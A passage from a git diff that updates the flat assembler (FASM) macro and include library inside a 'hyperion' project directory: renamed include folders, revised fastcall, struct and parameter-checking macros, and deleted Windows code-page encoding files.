\\} + struc dq [val] \\{ \common def@assumed reg,., \\} struc rb cnt \\{ def@assumed reg,.,rb cnt \\} struc rw cnt \\{ def@assumed reg,.,rw cnt \\} struc rp cnt \\{ def@assumed reg,.,rp cnt \\} @@ -59,4 +61,6 @@ macro def@assumed reg,name,def name equ ..label ..label def } +struc label type { label . type } + struc none { label . } diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/PROC32.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/PROC32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/PROC32.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/PROC32.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/PROC64.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/PROC64.INC old mode 100644 new mode 100755 similarity index 93% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/PROC64.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/PROC64.INC index 9ef292a..1fba99b --- a/binary/hyperion/source/Fasm/fasminclude/MACRO/PROC64.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/PROC64.INC @@ -73,7 +73,7 @@ macro fastcall proc,[arg] origin = $ inc param load opcode byte from origin - if opcode = 67h + if opcode = 67h | opcode = 41h load opcode byte from origin+1 end if if opcode and 0F8h = 48h @@ -106,6 +106,9 @@ macro fastcall proc,[arg] end if end if end if + if vararg@fastcall & ~ param eq rcx + movq rcx,xmm0 + end if else if type@param eq addr if ~ param eq rcx lea rcx,[param] @@ -146,6 +149,9 @@ macro fastcall proc,[arg] end if end if end if + if vararg@fastcall & ~ param eq rdx + movq rdx,xmm1 + end if else if type@param eq addr if ~ param eq rdx lea rdx,[param] @@ -186,6 +192,9 @@ macro fastcall proc,[arg] end if end if end if + if vararg@fastcall & ~ param eq r8 + movq r8,xmm2 + end if else if type@param eq addr if ~ param eq r8 lea r8,[param] 
@@ -226,6 +235,9 @@ macro fastcall proc,[arg] end if end if end if + if vararg@fastcall & ~ param eq r9 + movq r9,xmm3 + end if else if type@param eq addr if ~ param eq r9 lea r9,[param] @@ -449,7 +461,7 @@ macro initlocal@proc name,def current@initlocal = 4 load dword@initlocal dword from name+position@initlocal else - load qword@initlocal dword from name+position@initlocal + load qword@initlocal qword from name+position@initlocal if ( qword@initlocal > 0 & qword@initlocal < 80000000h ) | ( qword@initlocal < 0 & qword@initlocal >= -80000000h ) current@initlocal = 8 else @@ -594,5 +606,13 @@ macro static_rsp_close procname,flag,parmbytes,localbytes,reglist restore size@frame,current@frame } stdcall fix fastcall -ccall fix fastcall -cinvoke fix invoke + +macro cinvoke proc,[arg] + { common ccall [proc],arg } + +macro ccall proc,[arg] + { common vararg@fastcall = 1 + fastcall proc,arg + vararg@fastcall = 0 } + +vararg@fastcall = 0 \ No newline at end of file diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/RESOURCE.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/RESOURCE.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/RESOURCE.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/RESOURCE.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/STRUCT.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/STRUCT.INC old mode 100644 new mode 100755 similarity index 56% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/STRUCT.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/STRUCT.INC index 789dd17..aa5f99a --- a/binary/hyperion/source/Fasm/fasminclude/MACRO/STRUCT.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/STRUCT.INC 
@@ -3,77 +3,53 @@ macro struct name { virtual at 0 - fields@struct equ name - match child parent, name \{ fields@struct equ child,fields@\#parent \} + define @struct + field@struct equ name + match child parent, name \{ restore field@struct + field@struct equ child,fields@\#parent \} sub@struct equ - struc db [val] \{ \common define field@struct .,db, - fields@struct equ fields@struct,field@struct \} - struc dw [val] \{ \common define field@struct .,dw, - fields@struct equ fields@struct,field@struct \} - struc du [val] \{ \common define field@struct .,du, - fields@struct equ fields@struct,field@struct \} - struc dd [val] \{ \common define field@struct .,dd, - fields@struct equ fields@struct,field@struct \} - struc dp [val] \{ \common define field@struct .,dp, - fields@struct equ fields@struct,field@struct \} - struc dq [val] \{ \common define field@struct .,dq, - fields@struct equ fields@struct,field@struct \} - struc dt [val] \{ \common define field@struct .,dt, - fields@struct equ fields@struct,field@struct \} - struc rb count \{ define field@struct .,db,count dup (?) - fields@struct equ fields@struct,field@struct \} - struc rw count \{ define field@struct .,dw,count dup (?) - fields@struct equ fields@struct,field@struct \} - struc rd count \{ define field@struct .,dd,count dup (?) - fields@struct equ fields@struct,field@struct \} - struc rp count \{ define field@struct .,dp,count dup (?) - fields@struct equ fields@struct,field@struct \} - struc rq count \{ define field@struct .,dq,count dup (?) - fields@struct equ fields@struct,field@struct \} - struc rt count \{ define field@struct .,dt,count dup (?) 
- fields@struct equ fields@struct,field@struct \} + struc db [val] \{ \common define field@struct .,db, \} + struc dw [val] \{ \common define field@struct .,dw, \} + struc du [val] \{ \common define field@struct .,du, \} + struc dd [val] \{ \common define field@struct .,dd, \} + struc dp [val] \{ \common define field@struct .,dp, \} + struc dq [val] \{ \common define field@struct .,dq, \} + struc dt [val] \{ \common define field@struct .,dt, \} + struc rb count \{ define field@struct .,db,count dup (?) \} + struc rw count \{ define field@struct .,dw,count dup (?) \} + struc rd count \{ define field@struct .,dd,count dup (?) \} + struc rp count \{ define field@struct .,dp,count dup (?) \} + struc rq count \{ define field@struct .,dq,count dup (?) \} + struc rt count \{ define field@struct .,dt,count dup (?) \} macro db [val] \{ \common \local anonymous - define field@struct anonymous,db, - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,db, \} macro dw [val] \{ \common \local anonymous - define field@struct anonymous,dw, - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,dw, \} macro du [val] \{ \common \local anonymous - define field@struct anonymous,du, - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,du, \} macro dd [val] \{ \common \local anonymous - define field@struct anonymous,dd, - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,dd, \} macro dp [val] \{ \common \local anonymous - define field@struct anonymous,dp, - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,dp, \} macro dq [val] \{ \common \local anonymous - define field@struct anonymous,dq, - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,dq, \} macro dt [val] \{ \common \local anonymous - define field@struct anonymous,dt, - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,dt, \} 
macro rb count \{ \local anonymous - define field@struct anonymous,db,count dup (?) - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,db,count dup (?) \} macro rw count \{ \local anonymous - define field@struct anonymous,dw,count dup (?) - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,dw,count dup (?) \} macro rd count \{ \local anonymous - define field@struct anonymous,dd,count dup (?) - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,dd,count dup (?) \} macro rp count \{ \local anonymous - define field@struct anonymous,dp,count dup (?) - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,dp,count dup (?) \} macro rq count \{ \local anonymous - define field@struct anonymous,dq,count dup (?) - fields@struct equ fields@struct,field@struct \} + define field@struct anonymous,dq,count dup (?) \} macro rt count \{ \local anonymous - define field@struct anonymous,dt,count dup (?) - fields@struct equ fields@struct,field@struct \} - macro union \{ fields@struct equ fields@struct,,union,< + define field@struct anonymous,dt,count dup (?) \} + macro union \{ field@struct equ ,union,< sub@struct equ union \} - macro struct \{ fields@struct equ fields@struct,,substruct,< + macro struct \{ field@struct equ ,substruct,< sub@struct equ substruct \} } macro ends 
@@ -82,15 +58,19 @@ macro ends purge db,dw,du,dd,dp,dq,dt purge rb,rw,rd,rp,rq,rt purge union,struct + irpv fields,field@struct \\{ restore field@struct + \\common define fields@struct fields \\} match name tail,fields@struct, \\{ if $ display 'Error: definition of ',\\`name,' contains illegal instructions.',0Dh,0Ah err end if \\} - match name=,fields,fields@struct \\{ fields@struct equ + match name=,fields,fields@struct \\{ restore @struct make@struct name,fields define fields@\\#name fields \\} end virtual \} - match any, sub@struct \{ fields@struct equ fields@struct> \} + match any, sub@struct \{ tmp@struct equ field@struct + restore field@struct + field@struct equ tmp@struct> \} restore sub@struct } macro make@struct name,[field,type,def] @@ -133,8 +113,8 @@ macro define@struct name,[field,type,def] restruc name match values, list \{ struc name value \\{ \\local \\..base - match any, fields@struct \\\{ fields@struct equ fields@struct,.,name, \\\} - match , fields@struct \\\{ label \\..base + match , @struct \\\{ define field@struct .,name, \\\} + match no, @struct \\\{ label \\..base forward match , value \\\\{ field type def \\\\} match any, value \\\\{ field type value @@ -144,9 +124,9 @@ macro define@struct name,[field,type,def] common label . at \\..base \\\} \\} macro name value \\{ - match any, fields@struct \\\{ \\\local anonymous - fields@struct equ fields@struct,anonymous,name, \\\} - match , fields@struct \\\{ + match , @struct \\\{ \\\local anonymous + define field@struct anonymous,name, \\\} + match no, @struct \\\{ forward match , value \\\\{ type def \\\\} match any, value \\\\{ \\\\local ..field @@ -217,6 +197,7 @@ macro define@substruct parent,name,[field,type,def] { common virtual at parent#.#name forward + local value if ~ field eq . parent#field type def sizeof.#parent#field = $ - parent#field 
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/ADVAPI32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/ADVAPI32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/ADVAPI32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/ADVAPI32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/COMCTL32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/COMCTL32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/COMCTL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/COMCTL32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/COMDLG32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/COMDLG32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/COMDLG32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/COMDLG32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/GDI32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/GDI32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/GDI32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/GDI32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/KERNEL32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/KERNEL32.INC
old mode 100644
new mode 100755
similarity index 95%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/KERNEL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/KERNEL32.INC
index cdb3efe..12e3372
--- a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/KERNEL32.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/KERNEL32.INC
@@ -358,6 +358,7 @@ PulseEvent% = 1
 PurgeComm% = 2
 QueryDosDevice% = 3
 QueryInformationJobObject% = 5
+QueryPerformanceCounter% = 1
 QueryPerformanceFrequency% = 1
 QueryWin31IniFilesMappedToRegistry% = 4
 QueueUserAPC% = 3
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/SHELL32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/SHELL32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/SHELL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/SHELL32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/USER32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/USER32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/USER32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/USER32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/WSOCK32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/WSOCK32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/WSOCK32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/WSOCK32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32A.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32A.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/WIN32A.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN32A.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32AX.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32AX.INC
old mode 100644
new mode 100755
similarity index 91%
rename from binary/hyperion/source/Fasm/fasminclude/WIN32AX.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN32AX.INC
index 8f9d1a5..989f361
--- a/binary/hyperion/source/Fasm/fasminclude/WIN32AX.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN32AX.INC
@@ -75,15 +75,10 @@ macro pushd value ..continue: pushd equ \} match pushd =addr var,pushd value \{ \local ..opcode,..address - virtual at 0 - label ..address at var - mov eax,dword [..address] - load ..opcode from 0 - end virtual - if ..opcode = 0A1h + if +var relativeto 0 | +var relativeto $ push var else - lea edx,[..address] + lea edx,[var] push edx end if pushd equ \} diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32AXP.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32AXP.INC old mode 100644 new mode 100755 similarity index 85% rename from binary/hyperion/source/Fasm/fasminclude/WIN32AXP.INC rename to binary/hyperion/source/Fasm/INCLUDE/WIN32AXP.INC index af339aa..ff3c3c1 --- a/binary/hyperion/source/Fasm/fasminclude/WIN32AXP.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/WIN32AXP.INC @@ -43,11 +43,9 @@ macro allow_nesting \forward count@stdcall = count@stdcall+1 match =double value, arg \\{ count@stdcall = count@stdcall+1 \\} \common end if - if defined proc \# % - if count@stdcall <> proc \# % - display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah - err - end if + if proc eqtype 0 & defined proc \# % & count@stdcall <> proc \# % + display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah + assert 0 end if \reverse pushd \common call [proc] \} @@ -57,11 +55,9 @@ macro allow_nesting \forward count@stdcall = count@stdcall+1 match =double value, arg \\{ count@stdcall = count@stdcall+1 \\} \common end if - if defined proc \# % - if count@stdcall <> proc \# % - display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah - err - end if + if proc eqtype 0 & defined proc \# % & count@stdcall <> proc \# % + display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah + assert 0 end if \reverse pushd \common call proc \} 
@@ -97,15 +93,10 @@ macro pushd value ..continue: pushd equ \} match pushd =addr var,pushd value \{ \local ..opcode,..address - virtual at 0 - label ..address at var - mov eax,dword [..address] - load ..opcode from 0 - end virtual - if ..opcode = 0A1h + if +var relativeto 0 | +var relativeto $ push var else - lea edx,[..address] + lea edx,[var] push edx end if pushd equ \} diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32W.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32W.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/WIN32W.INC rename to binary/hyperion/source/Fasm/INCLUDE/WIN32W.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32WX.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32WX.INC old mode 100644 new mode 100755 similarity index 91% rename from binary/hyperion/source/Fasm/fasminclude/WIN32WX.INC rename to binary/hyperion/source/Fasm/INCLUDE/WIN32WX.INC index c5b7d91..2c74b53 --- a/binary/hyperion/source/Fasm/fasminclude/WIN32WX.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/WIN32WX.INC @@ -76,15 +76,10 @@ macro pushd value ..continue: pushd equ \} match pushd =addr var,pushd value \{ \local ..opcode,..address - virtual at 0 - label ..address at var - mov eax,dword [..address] - load ..opcode from 0 - end virtual - if ..opcode = 0A1h + if +var relativeto 0 | +var relativeto $ push var else - lea edx,[..address] + lea edx,[var] push edx end if pushd equ \} diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32WXP.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32WXP.INC old mode 100644 new mode 100755 similarity index 86% rename from binary/hyperion/source/Fasm/fasminclude/WIN32WXP.INC rename to binary/hyperion/source/Fasm/INCLUDE/WIN32WXP.INC index 6dd72ec..f421cc2 --- a/binary/hyperion/source/Fasm/fasminclude/WIN32WXP.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/WIN32WXP.INC 
@@ -43,11 +43,9 @@ macro allow_nesting \forward count@stdcall = count@stdcall+1 match =double value, arg \\{ count@stdcall = count@stdcall+1 \\} \common end if - if defined proc \# % - if count@stdcall <> proc \# % - display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah - err - end if + if proc eqtype 0 & defined proc \# % & count@stdcall <> proc \# % + display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah + assert 0 end if \reverse pushd \common call [proc] \} @@ -57,11 +55,9 @@ macro allow_nesting \forward count@stdcall = count@stdcall+1 match =double value, arg \\{ count@stdcall = count@stdcall+1 \\} \common end if - if defined proc \# % - if count@stdcall <> proc \# % - display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah - err - end if + if proc eqtype 0 & defined proc \# % & count@stdcall <> proc \# % + display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah + assert 0 end if \reverse pushd \common call proc \} @@ -98,15 +94,10 @@ macro pushd value ..continue: pushd equ \} match pushd =addr var,pushd value \{ \local ..opcode,..address - virtual at 0 - label ..address at var - mov eax,dword [..address] - load ..opcode from 0 - end virtual - if ..opcode = 0A1h + if +var relativeto 0 | +var relativeto $ push var else - lea edx,[..address] + lea edx,[var] push edx end if pushd equ \} diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64A.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64A.INC old mode 100644 new mode 100755 similarity index 91% rename from binary/hyperion/source/Fasm/fasminclude/WIN64A.INC rename to binary/hyperion/source/Fasm/INCLUDE/WIN64A.INC index c94e2b4..ca02736 --- a/binary/hyperion/source/Fasm/fasminclude/WIN64A.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64A.INC 
@@ -14,7 +14,7 @@ sizeof.TCHAR = 1 include 'equates/kernel64.inc' include 'equates/user64.inc' -include 'equates/gdi32.inc' +include 'equates/gdi64.inc' include 'equates/comctl64.inc' include 'equates/comdlg64.inc' include 'equates/shell64.inc' diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64AX.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64AX.INC old mode 100644 new mode 100755 similarity index 94% rename from binary/hyperion/source/Fasm/fasminclude/WIN64AX.INC rename to binary/hyperion/source/Fasm/INCLUDE/WIN64AX.INC index 9f8cdff..42dc7db --- a/binary/hyperion/source/Fasm/fasminclude/WIN64AX.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64AX.INC @@ -65,7 +65,7 @@ macro allow_nesting end if end if ..next: \\} - list equ list param + list equ list \common ..close_nest: match ,nested_frame \\{ endf \\} if flags and 1 diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64AXP.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64AXP.INC old mode 100644 new mode 100755 similarity index 90% rename from binary/hyperion/source/Fasm/fasminclude/WIN64AXP.INC rename to binary/hyperion/source/Fasm/INCLUDE/WIN64AXP.INC index fb562f5..838c7c7 --- a/binary/hyperion/source/Fasm/fasminclude/WIN64AXP.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64AXP.INC @@ -65,7 +65,7 @@ macro allow_nesting end if end if ..next: \\} - list equ list param + match any,param \\{ list equ list \\} \common ..close_nest: match ,nested_frame \\{ endf \\} if flags and 1 @@ -132,11 +132,9 @@ macro allow_nesting match ,outer_frame \\{ endf \\} proc@paramcheck equ proc match [name],proc \\{ define proc@paramcheck name \\} - match name,proc@paramcheck \\{ if defined name \\# % - if counter <> name \\# % - display "Error: invalid count of parameters for ",\\`name,".",0Dh,0Ah - err - end if + match name,proc@paramcheck \\{ if name eqtype 0 & defined name \\# % & counter <> name \\# % + display "Error: invalid count of parameters for ",\\`name,".",0Dh,0Ah + assert 0 end if \\} \} } allow_nesting 
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64W.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64W.INC old mode 100644 new mode 100755 similarity index 91% rename from binary/hyperion/source/Fasm/fasminclude/WIN64W.INC rename to binary/hyperion/source/Fasm/INCLUDE/WIN64W.INC index 345f8b7..c18ddfd --- a/binary/hyperion/source/Fasm/fasminclude/WIN64W.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64W.INC @@ -14,7 +14,7 @@ sizeof.TCHAR = 2 include 'equates/kernel64.inc' include 'equates/user64.inc' -include 'equates/gdi32.inc' +include 'equates/gdi64.inc' include 'equates/comctl64.inc' include 'equates/comdlg64.inc' include 'equates/shell64.inc' diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64WX.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64WX.INC old mode 100644 new mode 100755 similarity index 94% rename from binary/hyperion/source/Fasm/fasminclude/WIN64WX.INC rename to binary/hyperion/source/Fasm/INCLUDE/WIN64WX.INC index 8a07cec..5da6add --- a/binary/hyperion/source/Fasm/fasminclude/WIN64WX.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64WX.INC @@ -65,7 +65,7 @@ macro allow_nesting end if end if ..next: \\} - list equ list param + list equ list \common ..close_nest: match ,nested_frame \\{ endf \\} if flags and 1 diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64WXP.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64WXP.INC old mode 100644 new mode 100755 similarity index 90% rename from binary/hyperion/source/Fasm/fasminclude/WIN64WXP.INC rename to binary/hyperion/source/Fasm/INCLUDE/WIN64WXP.INC index 91810dc..19640e8 --- a/binary/hyperion/source/Fasm/fasminclude/WIN64WXP.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64WXP.INC @@ -65,7 +65,7 @@ macro allow_nesting end if end if ..next: \\} - list equ list param + match any,param \\{ list equ list \\} \common ..close_nest: match ,nested_frame \\{ endf \\} if flags and 1 
@@ -132,11 +132,9 @@ macro allow_nesting match ,outer_frame \\{ endf \\} proc@paramcheck equ proc match [name],proc \\{ define proc@paramcheck name \\} - match name,proc@paramcheck \\{ if defined name \\# % - if counter <> name \\# % - display "Error: invalid count of parameters for ",\\`name,".",0Dh,0Ah - err - end if + match name,proc@paramcheck \\{ if name eqtype 0 & defined name \\# % & counter <> name \\# % + display "Error: invalid count of parameters for ",\\`name,".",0Dh,0Ah + assert 0 end if \\} \} } allow_nesting diff --git a/binary/hyperion/source/Fasm/fasm.exe b/binary/hyperion/source/Fasm/fasm.exe old mode 100644 new mode 100755 index e4fcfa2..d826ca9 Binary files a/binary/hyperion/source/Fasm/fasm.exe and b/binary/hyperion/source/Fasm/fasm.exe differ diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1250.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1250.INC deleted file mode 100644 index e4cf008..0000000 --- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1250.INC +++ /dev/null 
@@ -1,39 +0,0 @@ - -; Windows 1250 - -macro du [arg] - { local offset,char - offset = $-$$ - du arg - if arg eqtype '' - repeat ($-offset-$$)/2 - load char byte from $$+offset+(%-1)*2 - if char > 7Fh - virtual at 0 - if char < 90h - dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,160h,2039h,15Ah,164h,17Dh,179h - else if char < 0A0h - dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,161h,203Ah,15Bh,165h,17Eh,17Ah - else if char < 0B0h - dw 0A0h,2C7h,2D8h,141h,0A4h,104h,0A6h,0A7h,0A8h,0A9h,15Eh,0ABh,0ACh,0ADh,0AEh,17Bh - else if char < 0C0h - dw 0B0h,0B1h,2DBh,142h,0B4h,0B5h,0B6h,0B7h,0B8h,105h,15Fh,0BBh,13Dh,2DDh,13Eh,17Ch - else if char < 0D0h - dw 154h,0C1h,0C2h,102h,0C4h,139h,106h,0C7h,10Ch,0C9h,118h,0CBh,11Ah,0CDh,0CEh,10Eh - else if char < 0E0h - dw 110h,143h,147h,0D3h,0D4h,150h,0D6h,0D7h,158h,16Eh,0DAh,170h,0DCh,0DDh,162h,0DFh - else if char < 0F0h - dw 155h,0E1h,0E2h,103h,0E4h,13Ah,107h,0E7h,10Dh,0E9h,119h,0EBh,11Bh,0EDh,0EEh,10Fh - else - dw 111h,144h,148h,0F3h,0F4h,151h,0F6h,0F7h,159h,16Fh,0FAh,171h,0FCh,0FDh,163h,2D9h - end if - load char word from (char and 0Fh)*2 - end virtual - store word char at $$+offset+(%-1)*2 - end if - end repeat - end if } - -struc du [args] - { common label . word - du args } diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1251.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1251.INC deleted file mode 100644 index 52eed10..0000000 --- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1251.INC +++ /dev/null 
@@ -1,35 +0,0 @@ - -; Windows 1251 - -macro du [arg] - { local offset,char - offset = $-$$ - du arg - if arg eqtype '' - repeat ($-offset-$$)/2 - load char byte from $$+offset+(%-1)*2 - if char > 7Fh - if char < 0C0h - virtual at 0 - if char < 90h - dw 401h,403h,201Ah,453h,201Eh,2026h,2020h,2021h,20ACh,2030h,409h,2039h,40Ah,40Ch,40Bh,40Fh - else if char < 0A0h - dw 452h,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,459h,203Ah,45Ah,45Ch,45Bh,45Fh - else if char < 0B0h - dw 0A0h,40Eh,45Eh,408h,0A4h,490h,0A6h,0A7h,401h,0A9h,404h,0ABh,0ACh,0ADh,0AEh,407h - else - dw 0B0h,0B1h,406h,456h,491h,0B5h,0B6h,0B7h,451h,2116h,454h,0BBh,458h,405h,455h,457h - end if - load char word from (char and 0Fh)*2 - end virtual - else - char = 410h+char-0C0h - end if - store word char at $$+offset+(%-1)*2 - end if - end repeat - end if } - -struc du [args] - { common label . word - du args } diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1252.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1252.INC deleted file mode 100644 index 9a2c3dc..0000000 --- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1252.INC +++ /dev/null @@ -1,27 +0,0 @@ - -; Windows 1252 - -macro du [arg] - { local offset,char - offset = $-$$ - du arg - if arg eqtype '' - repeat ($-offset-$$)/2 - load char byte from $$+offset+(%-1)*2 - if char > 7Fh & char < 0A0h - virtual at 0 - if char < 90h - dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,17D,? - else - dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,17Eh,178h - end if - load char word from (char and 0Fh)*2 - end virtual - store word char at $$+offset+(%-1)*2 - end if - end repeat - end if } - -struc du [args] - { common label . word - du args } diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1253.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1253.INC deleted file mode 100644 index a70cc62..0000000 
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1253.INC +++ /dev/null @@ -1,35 +0,0 @@ - -; Windows 1253 - -macro du [arg] - { local offset,char - offset = $-$$ - du arg - if arg eqtype '' - repeat ($-offset-$$)/2 - load char byte from $$+offset+(%-1)*2 - if char > 7Fh - if char < 0C0h - virtual at 0 - if char < 90h - dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,?,?,? - else if char < 0A0h - dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,?,?,? - else if char < 0B0h - dw 0A0h,385h,386h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,?,0ABh,0ACh,0ADh,0AEh,2015h - else - dw 0B0h,0B1h,0B2h,0B3h,384h,0B5h,0B6h,0B7h,288h,389h,38Ah,0BBh,38Ch,0BDh,38Eh,38Fh - end if - load char word from (char and 0Fh)*2 - end virtual - else - char = 390h+char-0C0h - end if - store word char at $$+offset+(%-1)*2 - end if - end repeat - end if } - -struc du [args] - { common label . word - du args } diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1254.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1254.INC deleted file mode 100644 index 45cff5a..0000000 --- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1254.INC +++ /dev/null 
